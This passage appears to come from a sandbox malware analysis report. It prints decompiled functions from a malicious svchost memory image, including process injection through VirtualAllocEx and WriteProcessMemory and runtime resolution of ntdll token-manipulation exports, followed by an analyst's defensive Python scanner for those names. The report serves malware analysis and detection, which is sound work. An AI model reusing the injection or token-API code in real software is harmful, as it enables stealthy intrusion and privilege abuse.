                                                                                                                                   						_t8 = _t8 + 1;
                                                                                                                                   						if(_t8 < 0xa) {         // and retry, at most 10 attempts in total
                                                                                                                                   							continue;
                                                                                                                                   						}
                                                                                                                                   						goto L6;
                                                                                                                                   					}
                                                                                                                                   				}
                                                                                                                                   				 *_t9 = _t3;                    // success: hand the open handle back through _a8
                                                                                                                                   				goto L9;
                                                                                                                                   			}







                                                                                                                                   (Address column for the listing above, 0x02514001 .. 0x0251405b, one address per C-code line; the line-by-line alignment was lost in extraction.)

APIs
• CreateFileA.KERNEL32(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,025222F8,025142B6,00000000,00000001,025222F8,00000000,?,025198FD), ref: 02514021
• GetLastError.KERNEL32(?,025198FD,00000001,00000100,025222F8,0251A3C7), ref: 0251402C
• Sleep.KERNEL32(000001F4,?,025198FD,00000001,00000100,025222F8,0251A3C7), ref: 02514046
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: CreateErrorFileLastSleep
• String ID:
• API String ID: 408151869-0
• Opcode ID: b96c0f07e2834c3fe21796d6e407cc724ccd5d68ef97ef627b8a538cf48f8dc1
• Instruction ID: 44146ca40e746503dad8084906bcff9d6c84f6e954d0914de688f3ffdc04a9ed
• Opcode Fuzzy Hash: b96c0f07e2834c3fe21796d6e407cc724ccd5d68ef97ef627b8a538cf48f8dc1
• Instruction Fuzzy Hash: A1F08232640141AAF7350F25AC49B3A36A1FB82724F665A24F3B5EE0D0C73044899A1C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0251DB67(long _a4, long _a8, CHAR* _a12, CHAR* _a16) {
	char _v264;        // 0x104-byte (MAX_PATH) path buffer on the stack
	signed int _t13;
	void* _t17;
	CHAR* _t18;
	void* _t19;        // decompiler artefact: the frame base, so _t19 - 0x104 is &_v264

	// Read the directory named by environment variable _a12 into the path buffer
	_t13 = GetEnvironmentVariableA(_a12,  &_v264, 0x104);
	if(_t13 == 0) {
		return _t13 | 0xffffffff;   // variable not found: return -1 (INVALID_HANDLE_VALUE)
	} else {
		_t18 = _t19 + _t13 - 0x104;                  // points just past the copied value
		if( *((char*)(_t18 - 1)) == 0x5c) {          // value ends in '\': drop it
			_t18 = _t19 + _t13 - 0x105;
			 *_t18 = 0;
		}
		lstrcpyA(_t18, _a16);   // append the file name _a16 directly after the directory value
		// _a4 = desired access, _a8 = creation disposition,
		// 1 = FILE_SHARE_READ, 0x80 = FILE_ATTRIBUTE_NORMAL
		_t17 = CreateFileA( &_v264, _a4, 1, 0, _a8, 0x80, 0); // executed
		return _t17;
	}
}


APIs
• GetEnvironmentVariableA.KERNEL32(0251DC19,?,00000104), ref: 0251DB7F
• lstrcpyA.KERNEL32(?,025228F8), ref: 0251DBA4
• CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000080,00000000), ref: 0251DBC2
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: CreateEnvironmentFileVariablelstrcpy
• String ID:
• API String ID: 2536392590-0
• Opcode ID: d6e7cae19a8a2b67c946293bf1a6fdb49510825dcb349f52ee257249b41da189
• Instruction ID: 6fa6a3541d60cd18aac819806452c854b18e0045806d0d021df25ec5ceac5fb9
• Opcode Fuzzy Hash: d6e7cae19a8a2b67c946293bf1a6fdb49510825dcb349f52ee257249b41da189
• Instruction Fuzzy Hash: AEF0BE70540209ABFF21DF64DC89FE93B69BB10308F6045A4BB91A40D0D7F2D599DF28
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
E025130B5() {
	char _v132;     // 0x80-byte host name buffer
	char* _t9;
	void* _t14;
	void* _t15;

	E0251EE2A(_t14,  &_v132, 0, 0x80);   // zero the buffer (memset-style helper)
	gethostname( &_v132, 0x80); // executed
	_t9 =  &_v132;
	// WS2_32 ordinal 52 is gethostbyname (see the APIs list); the decompiler does not
	// model its return value, but _t9 is used below as the returned hostent*
	__imp__#52(_t9, _t15); // executed
	if(_t9 == 0) {
		return 0;   // lookup failed
	} else {
		// hostent + 0xc is h_addr_list; return the first address entry (the local IPv4 address)
		return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc))))));
	}
}


APIs
• gethostname.WS2_32(?,00000080), ref: 025130D8
• gethostbyname.WS2_32(?), ref: 025130E2
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: gethostbynamegethostname
• String ID:
• API String ID: 3961807697-0
• Opcode ID: 885bd949bd11788b8109eacc355d3a00868f3edc845a2bf28f42cb507457d6d6
• Instruction ID: 3714b2746f38d2b5075dbc21088b9b2e2c09046b6eb281b6cca6284f5c24f191
• Opcode Fuzzy Hash: 885bd949bd11788b8109eacc355d3a00868f3edc845a2bf28f42cb507457d6d6
• Instruction Fuzzy Hash: 5BE09B71D01119ABDF10DBA8EC85F9A77ECFF05308F080561F905E3280EA34E5088794
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0251EC2E(void* _a4) {
	void* _t2;   // decompiler artefact: never assigned, so the _a4 == 0 path returns an undefined value
	char _t5;
	void* _t7;

	_t7 = _a4;
	if(_t7 != 0) {
		E0251EBA0(_t7);   // helper that calls GetProcessHeap/HeapSize on the block (subcall listed under APIs)
		_t5 = RtlFreeHeap(GetProcessHeap(), 0, _t7); // executed
		return _t5;       // free(p)-style wrapper over the process heap
	}
	return _t2;
}


APIs
  • Part of subcall function 0251EBA0: GetProcessHeap.KERNEL32(00000000,00000000,0251EC0A,00000000,80000001,?,0251DB55,7FFF0001), ref: 0251EBAD
  • Part of subcall function 0251EBA0: HeapSize.KERNEL32(00000000,?,0251DB55,7FFF0001), ref: 0251EBB4
• GetProcessHeap.KERNEL32(00000000,0251EA27,00000000,0251EA27,00000000), ref: 0251EC41
• RtlFreeHeap.NTDLL(00000000), ref: 0251EC48
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$Process$FreeSize
• String ID:
• API String ID: 1305341483-0
• Opcode ID: cf13d15db12c796a408779a911764f083ebc6d16c2f8d5a6278870663028be3e
• Instruction ID: 1559fb3def3127327b310506beadde7eb1237825d24cd9e1c4930f0e5bb286da
• Opcode Fuzzy Hash: cf13d15db12c796a408779a911764f083ebc6d16c2f8d5a6278870663028be3e
• Instruction Fuzzy Hash: 4EC012328472306BD5613A50BC0EF9B6B58BFD6711F0A0809F805660C0876058455AE9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0251EBCC(long _a4) {
	void* _t3;
	void* _t7;

	// malloc(_a4)-style wrapper over the process heap
	_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
	_t7 = _t3;
	E0251EB74(_t7);   // helper that calls GetProcessHeap/HeapSize on the new block (subcall listed under APIs)
	return _t7;       // note: the allocation result is not checked for NULL before use
}


APIs
• GetProcessHeap.KERNEL32(00000000,00000000,80000001,0251EBFE,7FFF0001,?,0251DB55,7FFF0001), ref: 0251EBD3
• RtlAllocateHeap.NTDLL(00000000,?,0251DB55,7FFF0001), ref: 0251EBDA
  • Part of subcall function 0251EB74: GetProcessHeap.KERNEL32(00000000,00000000,0251EC28,00000000,?,0251DB55,7FFF0001), ref: 0251EB81
  • Part of subcall function 0251EB74: HeapSize.KERNEL32(00000000,?,0251DB55,7FFF0001), ref: 0251EB88
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$Process$AllocateSize
• String ID:
• API String ID: 2559512979-0
• Opcode ID: 2431643ef6099d53a9b4f2bec657828df0de18a1e1b4c183e046469ea0d0feb9
• Instruction ID: 65fc230762ac7c4c902d554055635330cba3f7ab69eadfe3e11a97eb06718969
• Opcode Fuzzy Hash: 2431643ef6099d53a9b4f2bec657828df0de18a1e1b4c183e046469ea0d0feb9
• Instruction Fuzzy Hash: 16C0803294523067D6113BA4BC0DF9A3E94FF95352F050404F505C11D0C73448549799
Uniqueness

Uniqueness Score: -1.00%

APIs
• recv.WS2_32(000000C8,?,00000000,0251CA44), ref: 0251F476
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: recv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1507349165-0
                                                                                                                                  • Opcode ID: e39cf05d360cd33612f387f7740cb1f252fd7b8fd60044be270f61a6c07b9264
                                                                                                                                  • Instruction ID: 080b872314b5c3064a27feb791e7b07813d3d37f71226bc10c054bfe0965761f
                                                                                                                                  • Opcode Fuzzy Hash: e39cf05d360cd33612f387f7740cb1f252fd7b8fd60044be270f61a6c07b9264
                                                                                                                                  • Instruction Fuzzy Hash: 09F0823220164AABAB119E59DC84CAB3FAEFBC92107040522FA04D3110D771D8248B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E02511978(intOrPtr _a4, signed short _a8) {
                                                                                                                                  				void* _t4;
                                                                                                                                  				void* _t8;
                                                                                                                                  
                                                                                                                                  				_t8 = 0;
                                                                                                                                  				_t4 = E0251F428(_a4, _a8 & 0x0000ffff);
                                                                                                                                  				if(_t4 > 0) {
                                                                                                                                  					_t8 = 1; // executed
                                                                                                                                  					__imp__#3(_t4); // executed
                                                                                                                                  				}
                                                                                                                                  				return _t8;
                                                                                                                                  			}






                                                                                                                                  APIs
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 02511992
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2781271927-0
                                                                                                                                  • Opcode ID: 7c14b870e33822b16230c0893e1ff9a17c9585be8056185f948ca61138bc51d9
                                                                                                                                  • Instruction ID: 35c163357cf43c429cb333df9b65c43c99b4fedca6104beb31de7c57b888ff40
                                                                                                                                  • Opcode Fuzzy Hash: 7c14b870e33822b16230c0893e1ff9a17c9585be8056185f948ca61138bc51d9
                                                                                                                                  • Instruction Fuzzy Hash: 5DD022221486326A62102718F80047FAB8CEF45262701941BFC48C0080C730C84187A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251DD84(intOrPtr _a4, CHAR* _a8) {
                                                                                                                                  				intOrPtr _t7;
                                                                                                                                  				int _t10;
                                                                                                                                  				intOrPtr* _t12;
                                                                                                                                  				intOrPtr _t13;
                                                                                                                                  				void* _t14;
                                                                                                                                  
                                                                                                                                  				_t12 = 0x25220e4;
                                                                                                                                  				_t14 =  *0x25220e4 - 0x25220e4; // 0x2a05278
                                                                                                                                  				if(_t14 == 0) {
                                                                                                                                  					L6:
                                                                                                                                  					return 0;
                                                                                                                                  				} else {
                                                                                                                                  					goto L1;
                                                                                                                                  				}
                                                                                                                                  				do {
                                                                                                                                  					L1:
                                                                                                                                  					_t7 = _a4;
                                                                                                                                  					_t13 =  *_t12;
                                                                                                                                  					if(_t7 == 0xffffffff ||  *((intOrPtr*)(_t13 + 0xc)) == _t7) {
                                                                                                                                  						if(_a8 == 0) {
                                                                                                                                  							L8:
                                                                                                                                  							return _t13;
                                                                                                                                  						}
                                                                                                                                  						_t5 = _t13 + 0x10; // 0x80000011
                                                                                                                                  						_t10 = lstrcmpiA(_t5, _a8); // executed
                                                                                                                                  						if(_t10 == 0) {
                                                                                                                                  							goto L8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t12 =  *_t12;
                                                                                                                                  				} while ( *_t12 != 0x25220e4);
                                                                                                                                  				goto L6;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0251DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0251E3A7,000000F0), ref: 0251DDB5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                  • Opcode ID: eb6440ecba2c7cfbc05611328c34e489679dbcb21b428d33cf053470f8f128d1
                                                                                                                                  • Instruction ID: 6bdbe4c68fb7ac5befdb2ae626bff46b169b2e9a938ed7d1b27e119e2ab69547
                                                                                                                                  • Opcode Fuzzy Hash: eb6440ecba2c7cfbc05611328c34e489679dbcb21b428d33cf053470f8f128d1
                                                                                                                                  • Instruction Fuzzy Hash: 38F08C36202212CBEB30CE249884666BBF8FB87229F194C2EE655D2180D730D859DB19
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _t15;
                                                                                                                                  				void* _t16;
                                                                                                                                  				long _t26;
                                                                                                                                  				struct HINSTANCE__* _t32;
                                                                                                                                  				void* _t37;
                                                                                                                                  
                                                                                                                                  				if(_a8 != 0) {
                                                                                                                                  					_t32 = GetModuleHandleA(0);
                                                                                                                                  					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
                                                                                                                                  					_t15 = VirtualAlloc(0, _t26, 0x1000, 4);
                                                                                                                                  					_v8 = _t15;
                                                                                                                                  					if(_t15 == 0) {
                                                                                                                                  						L5:
                                                                                                                                  						_t16 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						E0251EE08(_t15, _t32, _t26);
                                                                                                                                  						_t37 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40);
                                                                                                                                  						if(_t37 == 0) {
                                                                                                                                  							goto L5;
                                                                                                                                  						} else {
                                                                                                                                  							E025162B7(_v8, _t37);
                                                                                                                                  							if(WriteProcessMemory(_a8, _t37, _v8, _t26, 0) != 0) {
                                                                                                                                  								 *_a16 = _t37;
                                                                                                                                  								 *_a12 = _t37 - _t32 + _a4;
                                                                                                                                  								_t16 = 1;
                                                                                                                                  							} else {
                                                                                                                                  								goto L5;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t16;
                                                                                                                                  				} else {
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02519816,EntryPoint), ref: 0251638F
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,02519816,EntryPoint), ref: 025163A9
                                                                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 025163CA
                                                                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 025163EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1965334864-0
                                                                                                                                  • Opcode ID: 94554eecabd2948df3982f2e2178bbd9f5abe5e365735f2f7e86172fdc095b3b
                                                                                                                                  • Instruction ID: 2b42308ce33153b3ff22cddb5d3deee82d07a0e38c0a749fd0f0afee07084af7
                                                                                                                                  • Opcode Fuzzy Hash: 94554eecabd2948df3982f2e2178bbd9f5abe5e365735f2f7e86172fdc095b3b
                                                                                                                                  • Instruction Fuzzy Hash: D41191B1A01219BFEB218E65DC49F9B3FACFB057A4F014464F914E72C0D770DC148AA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                   C-Code - Quality: 100%
                                                                                                                                   			// Resolves 15 ntdll exports by name and caches the pointers in a global table
                                                                                                                                   			// (HMODULE at 0x2523918, one slot per export from 0x252391c to 0x2523954).
                                                                                                                                   			// Return value: 1 when every slot is filled, 0 when ntdll.dll cannot be loaded,
                                                                                                                                   			// -n (n = 1..15) when the n-th GetProcAddress fails, so the caller can tell which
                                                                                                                                   			// export was missing. Because the names are resolved at runtime, none of them appear
                                                                                                                                   			// in the PE import directory; they are only visible as strings in the unpacked image.
                                                                                                                                   			E02511000() {
                                                                                                                                  				struct HINSTANCE__* _t2;
                                                                                                                                  				_Unknown_base(*)()* _t3;
                                                                                                                                  				signed int _t4;
                                                                                                                                  				struct HINSTANCE__* _t5;
                                                                                                                                  				_Unknown_base(*)()* _t6;
                                                                                                                                  				_Unknown_base(*)()* _t7;
                                                                                                                                  				_Unknown_base(*)()* _t8;
                                                                                                                                  				struct HINSTANCE__* _t9;
                                                                                                                                  				_Unknown_base(*)()* _t10;
                                                                                                                                  				_Unknown_base(*)()* _t11;
                                                                                                                                  				_Unknown_base(*)()* _t12;
                                                                                                                                  				struct HINSTANCE__* _t13;
                                                                                                                                  				_Unknown_base(*)()* _t14;
                                                                                                                                  				_Unknown_base(*)()* _t15;
                                                                                                                                  				_Unknown_base(*)()* _t16;
                                                                                                                                  				struct HINSTANCE__* _t17;
                                                                                                                                  				_Unknown_base(*)()* _t18;
                                                                                                                                  				_Unknown_base(*)()* _t19;
                                                                                                                                  				_Unknown_base(*)()* _t20;
                                                                                                                                  				struct HINSTANCE__* _t21;
                                                                                                                                  				_Unknown_base(*)()* _t22;
                                                                                                                                  				_Unknown_base(*)()* _t23;
                                                                                                                                  				struct HINSTANCE__* _t25;
                                                                                                                                  				struct HINSTANCE__* _t26;
                                                                                                                                  				struct HINSTANCE__* _t27;
                                                                                                                                  				struct HINSTANCE__* _t28;
                                                                                                                                  				struct HINSTANCE__* _t29;
                                                                                                                                  				struct HINSTANCE__* _t30;
                                                                                                                                  				struct HINSTANCE__* _t31;
                                                                                                                                  				struct HINSTANCE__* _t32;
                                                                                                                                  				struct HINSTANCE__* _t33;
                                                                                                                                  				signed int _t34;
                                                                                                                                  				signed int _t35;
                                                                                                                                  
                                                                                                                                   				_t2 =  *0x2523918; // 0x0, cached HMODULE of ntdll.dll
                                                                                                                                   				_t35 = _t34 | 0xffffffff; // error code for the first lookup: -1
                                                                                                                                   				if(_t2 != 0) {
                                                                                                                                   					L3:
                                                                                                                                   					// Fast path: if all 15 slots are already populated return 1, otherwise (re)resolve every export in order.
                                                                                                                                   					if( *0x252391c == 0 ||  *0x2523920 == 0 ||  *0x2523924 == 0 ||  *0x2523928 == 0 ||  *0x252392c == 0 ||  *0x2523930 == 0 ||  *0x2523934 == 0 ||  *0x2523938 == 0 ||  *0x252393c == 0 ||  *0x2523940 == 0 ||  *0x2523944 == 0 ||  *0x2523948 == 0 ||  *0x252394c == 0 ||  *0x2523950 == 0 ||  *0x2523954 == 0) {
                                                                                                                                  						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
                                                                                                                                  						 *0x252391c = _t3;
                                                                                                                                  						if(_t3 == 0) {
                                                                                                                                  							L34:
                                                                                                                                  							_t4 = _t35;
                                                                                                                                  						} else {
                                                                                                                                  							_t5 =  *0x2523918; // 0x0
                                                                                                                                  							_t35 = 0xfffffffe;
                                                                                                                                  							_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
                                                                                                                                  							 *0x2523920 = _t6;
                                                                                                                                  							if(_t6 == 0) {
                                                                                                                                  								goto L34;
                                                                                                                                  							} else {
                                                                                                                                  								_t25 =  *0x2523918; // 0x0
                                                                                                                                  								_t35 = 0xfffffffd;
                                                                                                                                  								_t7 = GetProcAddress(_t25, "NtTerminateProcess");
                                                                                                                                  								 *0x2523924 = _t7;
                                                                                                                                  								if(_t7 == 0) {
                                                                                                                                  									goto L34;
                                                                                                                                  								} else {
                                                                                                                                  									_t30 =  *0x2523918; // 0x0
                                                                                                                                  									_t35 = 0xfffffffc;
                                                                                                                                  									_t8 = GetProcAddress(_t30, "RtlFreeSid");
                                                                                                                                  									 *0x2523928 = _t8;
                                                                                                                                  									if(_t8 == 0) {
                                                                                                                                  										goto L34;
                                                                                                                                  									} else {
                                                                                                                                  										_t9 =  *0x2523918; // 0x0
                                                                                                                                  										_t35 = 0xfffffffb;
                                                                                                                                  										_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
                                                                                                                                  										 *0x252392c = _t10;
                                                                                                                                  										if(_t10 == 0) {
                                                                                                                                  											goto L34;
                                                                                                                                  										} else {
                                                                                                                                  											_t26 =  *0x2523918; // 0x0
                                                                                                                                  											_t35 = 0xfffffffa;
                                                                                                                                  											_t11 = GetProcAddress(_t26, "NtSetInformationThread");
                                                                                                                                  											 *0x2523930 = _t11;
                                                                                                                                  											if(_t11 == 0) {
                                                                                                                                  												goto L34;
                                                                                                                                  											} else {
                                                                                                                                  												_t31 =  *0x2523918; // 0x0
                                                                                                                                  												_t35 = 0xfffffff9;
                                                                                                                                  												_t12 = GetProcAddress(_t31, "NtSetInformationToken");
                                                                                                                                  												 *0x2523934 = _t12;
                                                                                                                                  												if(_t12 == 0) {
                                                                                                                                  													goto L34;
                                                                                                                                  												} else {
                                                                                                                                  													_t13 =  *0x2523918; // 0x0
                                                                                                                                  													_t35 = 0xfffffff8;
                                                                                                                                  													_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
                                                                                                                                  													 *0x2523938 = _t14;
                                                                                                                                  													if(_t14 == 0) {
                                                                                                                                  														goto L34;
                                                                                                                                  													} else {
                                                                                                                                  														_t27 =  *0x2523918; // 0x0
                                                                                                                                  														_t35 = 0xfffffff7;
                                                                                                                                  														_t15 = GetProcAddress(_t27, "NtClose");
                                                                                                                                  														 *0x252393c = _t15;
                                                                                                                                  														if(_t15 == 0) {
                                                                                                                                  															goto L34;
                                                                                                                                  														} else {
                                                                                                                                  															_t32 =  *0x2523918; // 0x0
                                                                                                                                  															_t35 = 0xfffffff6;
                                                                                                                                  															_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
                                                                                                                                  															 *0x2523940 = _t16;
                                                                                                                                  															if(_t16 == 0) {
                                                                                                                                  																goto L34;
                                                                                                                                  															} else {
                                                                                                                                  																_t17 =  *0x2523918; // 0x0
                                                                                                                                  																_t35 = 0xfffffff5;
                                                                                                                                  																_t18 = GetProcAddress(_t17, "NtDuplicateToken");
                                                                                                                                  																 *0x2523944 = _t18;
                                                                                                                                  																if(_t18 == 0) {
                                                                                                                                  																	goto L34;
                                                                                                                                  																} else {
                                                                                                                                  																	_t28 =  *0x2523918; // 0x0
                                                                                                                                  																	_t35 = 0xfffffff4;
                                                                                                                                  																	_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
                                                                                                                                  																	 *0x2523948 = _t19;
                                                                                                                                  																	if(_t19 == 0) {
                                                                                                                                  																		goto L34;
                                                                                                                                  																	} else {
                                                                                                                                  																		_t33 =  *0x2523918; // 0x0
                                                                                                                                  																		_t35 = 0xfffffff3;
                                                                                                                                  																		_t20 = GetProcAddress(_t33, "NtFilterToken");
                                                                                                                                  																		 *0x252394c = _t20;
                                                                                                                                  																		if(_t20 == 0) {
                                                                                                                                  																			goto L34;
                                                                                                                                  																		} else {
                                                                                                                                  																			_t21 =  *0x2523918; // 0x0
                                                                                                                                  																			_t35 = 0xfffffff2;
                                                                                                                                  																			_t22 = GetProcAddress(_t21, "RtlLengthSid");
                                                                                                                                  																			 *0x2523950 = _t22;
                                                                                                                                  																			if(_t22 == 0) {
                                                                                                                                  																				goto L34;
                                                                                                                                  																			} else {
                                                                                                                                  																				_t29 =  *0x2523918; // 0x0
                                                                                                                                  																				_t35 = 0xfffffff1;
                                                                                                                                  																				_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
                                                                                                                                  																				 *0x2523954 = _t23;
                                                                                                                                   																				_t1 = _t35 + 0x10; // -15 + 16 = 1: success value when the last lookup also succeeds
                                                                                                                                   																				_t4 = _t1;
                                                                                                                                  																				if(_t23 == 0) {
                                                                                                                                  																					goto L34;
                                                                                                                                  																				}
                                                                                                                                  																			}
                                                                                                                                  																		}
                                                                                                                                  																	}
                                                                                                                                  																}
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						return _t4;
                                                                                                                                   					} else {
                                                                                                                                   						return 1; // table already fully resolved
                                                                                                                                  					}
                                                                                                                                   				} else {
                                                                                                                                   					// ntdll.dll is already mapped into every process; LoadLibraryA only returns its base address.
                                                                                                                                   					_t2 = LoadLibraryA("ntdll.dll");
                                                                                                                                   					 *0x2523918 = _t2;
                                                                                                                                   					if(_t2 != 0) {
                                                                                                                                   						goto L3;
                                                                                                                                   					} else {
                                                                                                                                   						return _t2; // 0: ntdll.dll could not be loaded
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}
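The function above resolves its ntdll imports by name at runtime, so the export names are not in the PE import table but do survive as ASCII strings in the unpacked memory region (the 0x02510000 dump of svchost.exe listed under Memory Dump Source). The script below is an added example for this report, not code from the sample or from Joe Sandbox: it scans a memory image for those names in the order E02511000 resolves them, flags the token-manipulation subset (NtOpenProcessToken, NtDuplicateToken, NtFilterToken, NtSetInformationToken, NtQueryInformationToken) that underpins the "launch a process as a different user" signature, and reproduces the function's return-code convention so an analyst can map a negative return value back to the missing export. The memory image it scans is constructed inline for the example, not taken from the dump.

```python
"""Scan an unpacked memory image for the ntdll exports that E02511000 resolves by name.

Added example for this analysis report; not code from the sample or the sandbox.
The sample image below is constructed for the example, not taken from the dump.
"""
import re
from typing import Dict, Optional

# Export names in the exact order E02511000 calls GetProcAddress (from the decompiled code).
NTDLL_RESOLVE_ORDER = [
    "RtlExpandEnvironmentStrings_U",
    "RtlSetLastWin32Error",
    "NtTerminateProcess",
    "RtlFreeSid",
    "RtlInitUnicodeString",
    "NtSetInformationThread",
    "NtSetInformationToken",
    "RtlNtStatusToDosError",
    "NtClose",
    "NtOpenProcessToken",
    "NtDuplicateToken",
    "RtlAllocateAndInitializeSid",
    "NtFilterToken",
    "RtlLengthSid",
    "NtQueryInformationToken",
]

# Exports that only make sense together when the code opens, duplicates, restricts
# and rewrites access tokens, i.e. creates a process under a different security context.
TOKEN_APIS = {
    "NtOpenProcessToken",
    "NtDuplicateToken",
    "NtFilterToken",
    "NtSetInformationToken",
    "NtQueryInformationToken",
}


def find_resolved_apis(image: bytes) -> Dict[str, int]:
    """Return {export_name: offset} for every NUL-terminated export name found in image.

    The trailing NUL is required so that a name is only matched as a complete C string,
    not as a prefix of a longer identifier.
    """
    found: Dict[str, int] = {}
    for name in NTDLL_RESOLVE_ORDER:
        match = re.search(re.escape(name.encode("ascii")) + b"\x00", image)
        if match:
            found[name] = match.start()
    return found


def token_capability(found: Dict[str, int]) -> bool:
    """True when all five token-manipulation exports are present in the image."""
    return TOKEN_APIS <= set(found)


def expected_return_code(missing: Optional[str]) -> int:
    """Return value E02511000 produces if exactly one export (or none) is unresolvable.

    Success returns 1; the n-th failed lookup (1-based) returns -n, matching the
    _t35 = -1, -2, ..., -15 sequence in the decompilation.
    """
    if missing is None:
        return 1
    return -(NTDLL_RESOLVE_ORDER.index(missing) + 1)


# Constructed memory image: 16 bytes of filler, the module name, then each export
# name as a NUL-terminated string separated by three 0xCC bytes.
SAMPLE_IMAGE = (
    b"\x90" * 16
    + b"ntdll.dll\x00"
    + b"".join(n.encode("ascii") + b"\x00" + b"\xcc" * 3 for n in NTDLL_RESOLVE_ORDER)
    + b"\x00" * 8
)


if __name__ == "__main__":
    hits = find_resolved_apis(SAMPLE_IMAGE)
    for name, offset in hits.items():
        print(f"{offset:#08x}  {name}")
    print("token manipulation capability:", token_capability(hits))
    print("return code if NtFilterToken were missing:", expected_return_code("NtFilterToken"))
```

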